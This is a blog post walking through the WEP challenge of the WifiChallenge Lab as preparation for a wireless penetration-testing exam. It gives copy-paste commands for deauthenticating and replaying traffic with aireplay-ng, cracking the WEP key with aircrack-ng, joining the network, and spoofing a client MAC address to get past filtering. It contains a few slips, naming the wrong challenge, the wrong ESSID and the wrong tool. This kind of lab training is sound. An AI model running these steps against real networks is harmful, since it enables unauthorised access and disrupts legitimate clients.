Summary

This blog post is the third article in a series of three three that will serve as preparation for Offsec Wireless Professional (OSWP) exam. This one is is a complete walkthough the WEP challenge deliverd by WifiChallenge Lab. Parts 1 and 2 deal with WPA2-PSK and WPA2-MGT.

Disclaimer

This article is for informational and educational purpose only, and for those who’re willing and curious to know and learn about Security and Penetration Testing. The article does not contain any information or examples from the actual OSWP exam. It does provide a framework that you can use to your advantage. The content may not be used for illegal purposes. If you’re ready to learn something new for the good, then read on.

Why this blog?

There are a number of very good articles on study materials that can be used to pass the OSWP exam. The most notable ones are the OSWP playbook (https://zeyadazima.com/notes/oswplaybook/) and the Github page of “The H4ck3r Dude” (https://github.com/TheH4ck3rDude/OSWP-Exam-Notes).

Based on the two articles mentioned above, I have created an easy walkthrough for going through the WEP (Wired Equivalent Privacy) scenario. WEP was the first attempt to secure wireless communications by encrypting data. This walkthrough contains easy ‘copy pastables’. It is set up in such a way that you only need to change the values ​​of the required variables. This reduces errors and is much more efficient.

We will use the challenges from the WifiChallenge Lab (https://lab.wifichallenge.com/). This particular article is about the WPA2-MGT challenge.

Lab environment

This POC consists of just 1 machine: an attacker machine running the latest Docker installation of the WifiChallenge Lab version 2.1.

I will not explain how install Docker on Kali Linux. You can use the following installation walkthrough: https://www.geeksforgeeks.org/techtips/how-to-install-docker-in-kali-linux/

Create the WifiChallange Lab Docker environment and install additional tools

1. Open a command terminal and copy and paste the commands below:

cd /opt; 
sudo git clone https://github.com/r4ulcl/WiFiChallengeLab-docker
cd WiFiChallengeLab-docker
docker compose -f docker-compose.yml up

The required Docker containers should be up and running in about 5 minutes.

2. Check if all 4 WifiChallenge Lab Docker containers are running:

docker container ls

3. Check if Kali contains some new (virtual) Wifi interfaces:

iwconfig | grep wlan

Part 1: Enumerate Wifi networks and select the target WEP Access Point (AP) to attack

4. Kill processes that may cause problems with airmon-ng (such as NetworkManager). Copy and paste the command below and press enter:

sudo airmon-ng check kill

5. Set interface wlan0 in monitor mode.

sudo airmon-ng start wlan0

6. Check what AP’s are active on frequency band 2,4Ghz (WEP was never designed for the 5Ghz band).

sudo airodump-ng wlan0mon

Results:

We detected 1 potential APs configured as WEB. This AP transmits at channel 3 (see column ‘CH’).

7. Check the APs that are transmitting on channel 3 (press CNTL+C to stop the current monitor).

channel=3
sudo airodump-ng -c ${channel} wlan0mon

Note: In my OWSP exam it took a while before a station was connected. Tip: start the monitoring and take a 10 minute break.

We found one associated station with WEP based network ‘wifi-old’.

Results:

ESSID = wifi-old

BSSID = F0:9F:C2:71:22:11

Station = 3E:C8:44:0A:24:BA

Part 2: Capture handshake

In this part, we will capture an authentication handshake frame.

8. Open a new terminal tab. Start monitoring specifically on AP ‘wifi-corp’ and dump the output in a capture file. Use copy and paste to execute the following command(s):

channel=3
bssid='F0:9F:C2:71:22:11'
essid='wifi-old'
dumpfile='/tmp/dump-wep'
client='3E:C8:44:0A:24:BA'
sudo rm /tmp/dump-wep-01*
sudo airodump-ng -c ${channel}  -w ${dumpfile} --output-format pcap,csv --essid ${essid} --bssid ${bssid} wlan0mon

9. Open a second terminal tab. Send a deauthentication frame (broadcast). In that case the connected client will try to re-authenticate again during our capture. Use copy and paste to execute the following command(s):

bssid='F0:9F:C2:71:22:11'
essid='wifi-old'
client='3E:C8:44:0A:24:BA'
sudo aireplay-ng -1 3600 -q 10 -a ${bssid} -e ${essid} -c ${client} wlan0mon

10. In the second terminal, tab generate traffic in order to find duplicate IV’s.

bssid='F0:9F:C2:71:22:11'
essid='wifi-old'
client='3E:C8:44:0A:24:BA'
sudo aireplay-ng -3 -b ${bssid} -h ${client} wlan0mon

When you captured at least 10.000 ARP requests, return to terminal 1.

11. Press CTRL+C to stop airodump.

12. Stop monitoring on wlan0mon:

sudo airmon-ng stop wlan0mon

Part 3: Crack handshake

We will use hashcat to crack the authentication request that we captured.

13. Check if your dumpfile (including the authenticatin request) is present.

ls -l /tmp/dump-wep*

14. Use aircrack to crack the WEP authentication request. Use copy and paste to execute the following command(s):

dumpfile='/tmp/dump-wep'
sudo aircrack-ng ${dumpfile}-01.cap

Result:

We found the WEP key: ‘11:BB:33:CD:55’

Part 4: connect to the target network

In this final section, we will try to connect to the target network and dowload the proof.txt file.

15. Create a network configuration file. Use copy and paste to execute the following command(s) in the command terminal:

# create a WEP connection file
wep_key=11BB33CD55 #you need to remove the colons
essid='wifi-old'
cat << EOF > /tmp/wep.conf
 network={
           ssid="${essid}"
           key_mgmt=NONE
           wep_key0=${wep_key}
           wep_tx_keyidx=0
          }
EOF

16. Next, use network configuration file with the tool ‘wpa_suppliant’ and connect to the target WEP network. Copy and paste the following command:

sudo wpa_supplicant -i wlan0 -c /tmp/wep.conf

17. Get a valid ip-address on interface wlan0.

sudo dhclient wlan0 -v

18. Download the proof.txt file. On the OSWP exam, the target ip-address (for every scenario) is always 192.168.1.1. For illustration purposes only, we will try to download the proof.txt file from target 192.168.1.1.

target=192.168.1.1
curl http://${target}/proof.txt

Bonus: evade MAC address filtering

An access point can be configured with source MAC address filtering. This applies not only to WEP, but also to the WPA2-PSK/MGT scenario.

When MAC filtering is applied, connecting to the access point is not possible. Fortunately, this is easy to circumvent. Namely, this is possible with ‘MAC spoofing’. With MAC spoofing it possible to set up a connection using an existing IP address.

19. Configure interface wlan0 with an existing MAC address.

# Stop Interface
sudo ip link set wlan0 down
# Change the current MAC address with a MAC address of an existing client
client='3E:C8:44:0A:24:BA'
sudo macchanger -m ${client} wlan0
# Start Interface
sudo ip link set wlan0 up
# check interface MAC
ip link | grep wlan0 -A 1

20. Next, connect to the target network with the forged MAC address. Repeat steps 16 en 17.

References

· https://lab.wifichallenge.com

· https://www.offsec.com/courses/pen-210/

· https://zeyadazima.com/notes/oswplaybook

· https://github.com/TheH4ck3rDude/OSWP-Exam-Notes